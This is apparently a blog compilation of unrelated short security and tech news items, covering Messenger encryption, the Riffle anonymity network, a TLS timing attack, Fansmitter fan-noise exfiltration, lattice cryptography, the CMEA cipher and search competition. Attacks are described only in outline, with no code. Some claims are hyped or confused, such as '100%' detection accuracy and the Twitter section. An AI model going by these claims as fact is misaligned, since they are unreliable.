It seems that Facebook is finally coming to its senses and catching up to basically all of the other chat apps by adding end-to-end encryption to it Messenger. The “secret conversations” feature makes chats visible only to the sender and reader (finally!). This means that anyone other than a sender or a reader, including Facebook itself, law enforcement and criminals cannot read these selected chats.

There’s also another feature of ‘secret conversations’: it lets users set an expiration date for messages. I should mention that none of this is turned on by default – you actually have to enable it each time you use it in order to work. Also, this feature is only available to select few as it’s still in testing, but should be offered to the rest of Facebook very soon.

According to their blog post, ‘secret conversations’ can only be read on one device and rich content like videos, GIFs, making payments, and so on, are not currently supported.

Anonymity networks are very important because they protect people living under repressive regimes from surveillance of their Internet use. As one of the most popular free anonymity networks, Tor, was recently discovered to have a security vulnerability, researchers and computer scientists tried to come up with more secure anonymity networks. And they have succeeded: a new, more secure and efficient anonymity network has just been created.

The new anonymity network provides strong security guarantees and uses bandwidth more efficiently than its predecessors. In fact, in experiments, this network required only one-tenth as much time as existing systems to transfer a large file between anonymous users.

The network uses several existing cryptographic techniques but combines them in a completely new manner. The “heart” of the new system is a series of servers – mixnet. Each of these servers permutes the order in which it receives keys or messages before passing them on to the next. This means that an adversary that had tracked the messages’ points of origin would have no clue which was which by the time they exited the last server. This reshuffling of the messages is what gives the new system its name: Riffle.

The Internet encryption protocol TLS (Transport Layer Security) is being modified. Involved in attacks, researchers and IT experts have now contributed to revealing serious security gaps in the protocol.

The researchers have succeeded in stealing a key that two parties had negotiated via TLS version 1.2. This kind of a key is required when communication parties want to exchange secret information – customer transmitting credit card details to an online shop, for example. In this case, TLS protocol provides three approaches for negotiating keys, but most problems are caused by one of the handshake protocols, TLS-RSA. Here’s how that works:

The online shop server sends a letter box to the customer, in which the customer places a secret message and sends it back to the server. The webshop server opens the letter box, thus accessing the secret message, that is, the key.

The team performed a Bleichenbacher attack and gained access to the key. The IT experts fed errors into the secret message before putting it in the letter box and sending it to the server. The server, of course, expects that the incoming message has a specific form, so if it doesn’t, the error manager is launched. However, error management is more time-consuming than the server continuing key exchange as usual, and this time lag is what gave clues regarding the contents of the message.

The good news is, the new TLS version 1.3 is going to use a different protocol for key negotiation.

The number of internet attacks is growing rapidly, which puts a very heavy strain on traditional methods of intrusion detection. Also, these classic methods are not prepared for the growing number of connected devices or Internet of Things. The good news is, a researcher from University of Twente’s CTIT institute has developed another method of monitoring internet traffic, offering a better way to trace attacks and intrusions.

The new method is an open source software that is not only being tested but also already used by several major organizations and companies in the world.

The classic approach consists of checking the contents of a vast amount of data coming in, analyzing network traffic and then logging files on every computer. According to the researcher that developed a completely new approach, the old way implies analyzing huge amounts of data that will never actually have effect. Additionally, within a network of large organizations with thousands of computers, phones, and other devices connected, it will soon be impossible to check every device.

That’s why the new detection method chooses a “flow based” approach: looking at the data from a higher level and detecting patterns. This approach can take place at a central spot, like a router taking care of traffic, which means that even if the number of devices connected to this router is growing, the detection can be scaled up quickly and easily.

The detection accuracy of the new method is 100%.

Not to make you paranoid or anything, but here’s a security update: researchers have shown that the sounds made by a PC’s cooling fan can be analyzed and interpreted to extract pretty much anything – from passwords to encryption keys.

How is this possible, you ask? With a fan-exploiting malware called “Fansmitter”. Basically, your computer would have to be infected with a malware designed to steal information through interpreting sounds of your computer’s cooling fan. Once it’s installed, the fan-exploiting malware flips the fan speed between 1,000 RPM and 1,600 RPM, which is an audible difference that a microphone, such as one found on any smartphone, can easily pick up on.

In the research, the computer infected with Fansmitter was rattling off a long chain of numbers in binary. There was also a nearby phone listening and analyzing – successfully.

What does this mean? For one, a computer with nothing connected to it could still have data stolen with this malware. For another, it doesn’t work without a microphone. Because of this, Fansmitter and similar malware could never target massive number of users, but they could still cause serious damage to individuals (think people in politics, finance, military, etc.)

Internet of things (IoT) is our future. It’s basically a network of many physical devices, such as gadgets, home appliances, vehicles, buildings, etc, wirelessly connected to the IoT. It’s expected that, by the year 2020, about 20.8 billion devices will be connected to the IoT. While it’s true the IoT will make our lives easier, it’s also true that many everyday devices will become targets of hackers and attackers unless we find a way to close the security gaps in internet-connected households.

This is why many internet experts are working on improving the security of IoT. Some of them are from Germany and they are developing new methods for discovering and fixing vulnerabilities in the applications that are equipped with different types of processors and different types of software.

For example, an Intel processor in a traditional computer understands more than 500 commands, but a microcontroller in an electronic key is able to process about 20 commands. Also, same instructions are represented as different sequences of ones and zeros in the binary language of two processor types. This makes an automated analysis of many different devices very difficult and potentially useless.

In order to solve this issue, German experts are translating different binary languages into an intermediate language. They have been successful in implementing this approach for three different processor types: Intel, MIPS, ARM. Then, they look for security-critical programming errors on the intermediate language level and try to automatically close the security gaps.

This approach is expected to be completely processor-independent by the time the IoT project is wrapped up in the year 2020.

Researchers from Ruhr-Universitaet-Bochum (RUB) in Germany, have developed new cryptographic algorithms that, according to them, are virtually unbreakable.

Typically, cryptographic methods are created like this: somebody comes up with a new algorithm and another person tries to break it; if that person doesn’t succeed in breaking it, the algorithm is secure. However, the new algorithm created by researchers from RUB is made using a completely new approach: their security is based on particularly hard mathematical problems.

The researchers explain that their security algorithms were made by some of the best mathematicians: “If somebody succeeded in breaking those algorithms, he would be able to solve a mathematical problem that the greatest minds in the world have been poring over for 100 or 200 years”. In fact, those algorithms are so secure and efficient that they can be implemented into certain microdevices, such as electric garage openers.

The new algorithms are lattice-based authentication algorithms[1] and they are pretty advanced. The team tested various parameters that make the lattice problem harder or simpler and then used that as a base for developing a cryptographic algorithm. As for authentication protocols, they are required whenever an object has to prove its identity.

The team is also researching lattice-based encryption methods, which are needed whenever the two parties want to exchange a secret message.

[1] Lattice-based cryptography is a term for asymmetric cryptographic primitives which are based on lattices.

The famous twitter platform has a unique working format and we all are unaware of how it works and what magic wand it has that makes it show us the stories and tweets that we are interested in.

The basic algorithm of Twitter works on discover lab that is built to optimize and monitor our searches and friends and tweets. It is basically powered by Earlybird. Earlybird is Twitter’s search engine operator. As soon as you tweet something it processes it and makes it searchable. The URL is generated and is fetched by Spiderduck, the real time URL fetcher.

Your searches, tweets and connections are recorded and tabulated in graphical form. This graphical form is easy and helpful to tabulate the user’s activity. This mechanism is also monitored by graph processing mechanism, Cassovary, one of the most advanced graph processers. This system estimates how strong your connections are and then arranges them relatively according to your preferences. Twitter’s flexible search engine URL is one of the blessings that make the Twitter algorithm one of the best in the world.

In cryptography, the Cellular Message Encryption Algorithm (CMEA) is a block cipher that was used for increasing the security of mobile phones in USA. CMEA is among four cryptographic primitives pointed out in a Telecommunications Industry Association (TIA) standard, and the control channel is encrypted using this, rather than the voice data.

In 1997, a group of cryptographers made attacks on the cipher giving evidence that it had plethora of weaknesses that give it a trivial effective strength of a 24-bit to 32-bit cipher. NSA had been accused of pressurizing the original designers into crippling CMEA; however, the NSA has denied any role in the design or selection of the algorithm.

CMEA is described in U.S. Patent 5,159,634. It is byte-oriented, with varying block size: 2 to 6 bytes. The key size is 64 bits. For a modern cipher, they both are a lot smaller than usual. The algorithm is made up of only 3 passes over the data: a non-linear left-to-right diffusion operation, an un-keyed linear mixing, and another non-linear diffusion that is in fact the inverse of the first.

The non-linear operations use a keyed lookup table called the T-box, which makes use of an un-keyed lookup table called the “CaveTable”. The algorithm is self-inverse; re-encrypting the ciphertext with the same key and decrypting it is equivalent to one another.

You might think that after a solid decade of search-market dominance, Google could show some relaxation. After all, it commands a 65 percent market share and is still the only company whose name is synonymous with the verb search.

However, just as Google is not ready to rest on its founders, its competitors are not ready to accept defeat. For years, the Silicon Valley monolith has used its mysterious, seemingly omniscient algorithm to, as its mission statement puts it, “organize the world’s information.” But over the past five years, a slew of companies have challenged Google’s central premise: that a single search engine, through technological wizardry and constant refinement, can satisfy any possible query.

Facebook launched an early attack with its implication that some people would rather get information from their friends than from an anonymous formula. Twitter’s ability to parse its constant stream of updates introduced the concept of real-time search, a way of tapping into the latest chatter and conversation as it unfolds. Yelp helps people find restaurants, dry cleaners, and babysitters by crowdsourcing the ratings. None of these upstarts individually presents much of a threat, but together they hint at a wide-open, messier future of search — one that is not dominated by a single engine but rather incorporates a grab bag of services.